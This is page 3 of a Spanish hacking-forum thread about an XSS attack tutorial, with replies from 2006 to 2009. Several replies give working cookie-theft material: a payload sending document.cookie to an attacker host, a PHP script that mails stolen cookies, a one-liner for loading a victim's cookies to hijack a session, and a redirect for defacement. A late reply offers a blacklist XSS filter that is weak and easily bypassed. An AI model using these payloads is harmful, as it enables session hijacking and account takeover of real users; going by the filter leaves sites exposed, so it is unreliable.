[::Tutorial::] - Ataques XSS página 3

Foro de elhacker.net

Informática

Tutoriales - Documentación (Moderador: yeikos)

[::Tutorial::] - Ataques XSS

0 Usuarios y 2 Visitantes están viendo este tema.

Páginas: 1 2 [3] 4

Autor

Tema: [::Tutorial::] - Ataques XSS (Leído 53501 veces)

Ch@CaL

Desconectado

Mensajes: 27

All in your mind....

Re: [::Tutorial::] - Ataques XSS

« Respuesta #30 en: 11 Septiembre 2006, 16:49 »

Muy buen manual man xo tengo una duda,yo entro x ejemplo en el foro,xa ello me he de registrar x lo tanto he de ser usuario xa poder colocar la url entonces al ser usuiario xa que quiero saber el pass de otro user me interesaria saber la del admin mejor no?ahi supongo que entra a formar parte la ingenieria social.Me apareceran en el text todas las cookies de todos los que lo pinxen?


	En línea

Ch@CaL

|Azrack|

Desconectado

Mensajes: 96

Enjoy The Silence

Re: [::Tutorial::] - Ataques XSS

« Respuesta #31 en: 06 Diciembre 2006, 00:03 »

y si yo le paaso solo el enlace:

Código:

http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>

no serviria xq para robar la cookie la redirecion tiene q' ser desde la web vulnerable?


	En línea

Hay gente tan Ignorante que cree en dios.

Status MSN:>>

security

Desconectado

Mensajes: 1

Re: [::Tutorial::] - Ataques XSS

« Respuesta #32 en: 22 Mayo 2007, 17:06 »


	En línea

Dr. Stephen Falken

Desconectado

Mensajes: 1

Re: [::Tutorial::] - Ataques XSS

« Respuesta #33 en: 09 Enero 2008, 19:46 »

A día de hoy esta vulnerabilidad está casi capada. No?


	En línea

NaphacK

Desconectado

Mensajes: 12

Re: [::Tutorial::] - Ataques XSS

« Respuesta #34 en: 30 Enero 2008, 20:20 »

Cita de: Dr. Stephen Falken en 09 Enero 2008, 19:46

A día de hoy esta vulnerabilidad está casi capada. No?

No, aun se siguen encontrando vulnerables...
Aunque tengo una duda...
Que pasa si la pagina me dio acceso a unos archivos tipo ftp, lo que pasa es que me queda de una forma asi:
www.webvulnerable.com/free-press/unaslibrerias por esas librerias puedo navegar tranquilamente, y son scripts en java y php...
Osea, aunque no sea un boton buscar, puedo ejecutar igual la url maligna?
Saludos...


	En línea

merinodaniel

Desconectado

Mensajes: 1

Re: [::Tutorial::] - Ataques XSS

« Respuesta #35 en: 20 Octubre 2008, 00:55 »

hola a toos, justo he estado investigando XSS, y encontre q tb se puede hacer q se envie la cookie a un mail...

Código:

<?php
$cookie = $_GET["cookie"];
mail("admin@gensale.net", "Cookie stealer report", $cookie);
?>

este codigo seria para la pag: cookie.php
Este codigo fue publicado en el blog: blog.gensale.net
Yo no soy el autor..
byes


	En línea

R007h

Desconectado

Mensajes: 59

<script>alert('xss');</script>

Re: [::Tutorial::] - Ataques XSS

« Respuesta #36 en: 22 Diciembre 2008, 01:28 »

Hola, sta muy bueno el txt...

ya me consegui unas cookies pero cuando me voy al site y pongo

Código:

javascript: prompt('',document.cookie);

luego reemplazo las cookies por las que yo consegui, no pasa nada, sigue estando cerrada la session de mi victima, que pasa?


	En línea

sirdarckcat

Absolutamente no es (por ningun motivo):
CoAdmin

Desconectado

Mensajes: 6.386

xDDD

Re: [::Tutorial::] - Ataques XSS

« Respuesta #37 en: 22 Diciembre 2008, 03:35 »

usa este:
javascript:void prompt("Introduce la cookie:",document.cookie).replace(/[^;]+/g,function(_){document.cookie=_;});


	En línea

Leer reglas

- WarZone.elhacker.net Aprende hacking con práctica!
- Sigue las noticias del foro en twitter!
- Wiki de elhacker.net

- my web
- blog
- ej

slackbyte

Desconectado

Mensajes: 79

Re: [::Tutorial::] - Ataques XSS

« Respuesta #38 en: 04 Febrero 2009, 09:08 »

Que tal amigo, tengo una duda pues estoy algo novato en cuanto a los ataques XSS, un amigo queria que probara su servidor en busca de vulnerabilidades, y pues le intente con varias cosas, pero al probar lo de pnoer en el campo de texto <script>alert('vulnerable')</script> resulta que me saltó el mensaje de vulnerable. Ahora, la pregunta es ¿como puedo hacer un deface en su servidor? (conste que este chavo me dijo que no habia problema que le hiciera lo que quisiera a su sitio =P), es decir, yo puedo probar con:

<META HTTP-EQUIV="refresh" CONTENT="1; url=http://www.google.com">

y con esto lograré que cualquier persona que entre a su sitio, sea redireccionado a google? pregunto esto ya que con el ejemplo del alert() a pesar de que me manda el mensaje, al actualizar el sitio ya no me devuelve el mensaje, y lo que quiero es que esa configuracion se quede guardada, o algo por el estilo consiste el ataque xss no es asi? me gustaria me apoyaras con un poco de explicacion al respecto, de como puedo alterar el sitio y otros usuarios puedan ver esos cambios. muchas gracias.


	En línea

KarlosVid(ÊÇ)

Desconectado

Mensajes: 206

wWw.idat.byethost14.com/bb

Re: [::Tutorial::] - Ataques XSS

« Respuesta #39 en: 12 Junio 2009, 20:53 »

Este es el Codigo permite proteger ataques xss :rolleyes:

Código:

<?php
function xss($val) {
$patron = '[ ]+';
$val= ereg_replace($patron,' ', $val);

$patron = '[ ]*>';
$val= ereg_replace($patron,'>', $val);

$a=array('xml','script', 'applet','embed','iframe','frame', 'frameset','ilayer');
$tot=count($a)-1;
for($i=0;$i<=$tot;$i++){
$tag='<'.$a[$i];
if(strpos($val,$tag)!==false){
$patron = $tag.'(.*)>(.*)<\/'.$a[$i].'[ ]*>';
$val= eregi_replace($patron,'', $val);
}
}

$a=array('link','meta','base');
$tot=count($a)-1;
for($i=0;$i<=$tot;$i++){
if(strpos($val,'<'.$a[$i])!==false){
$val= str_ireplace('<'.$a[$i],'<x',$val);
}
}

$a=array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload','http-equiv','content','charset');
$tot=count($a)-1;
for($i=0;$i<=$tot;$i++){
if(strpos($val,$a[$i].'=')!==false){
$val= str_ireplace($a[$i].'=','',$val);
}
}
return $val;
}

?>

:: wWw.SiDAT.Tk - wWw.SiDAT.Tk -wWw.SiDAT.Tk - wWw.SiDAT.Tk ::


	En línea

( wWw.iDAT.BYETHOST14.Com/BB )

KarlosVid(ÊÇ)

Desconectado

Mensajes: 206

wWw.idat.byethost14.com/bb

Re: [::Tutorial::] - Ataques XSS

« Respuesta #40 en: 12 Junio 2009, 20:59 »

Probando el Ejemplo: xss.php (nombre del php que contiene la funcion xss)

Código:

<html><head>
<title>Ataques XSS</title>
</head>
<body>
<form id="form1" name="form1" method="post" action="XSS1.php">
Nombre usuario
<input name="txt_nom" type="text" id="txt_nom" size="80" />
<input type="submit" name="button" id="button" value="Enviar" />
</form>
</body>
</html>

:: wWw.SiDAT.Tk - wWw.SiDAT.Tk -wWw.SiDAT.Tk - wWw.SiDAT.Tk ::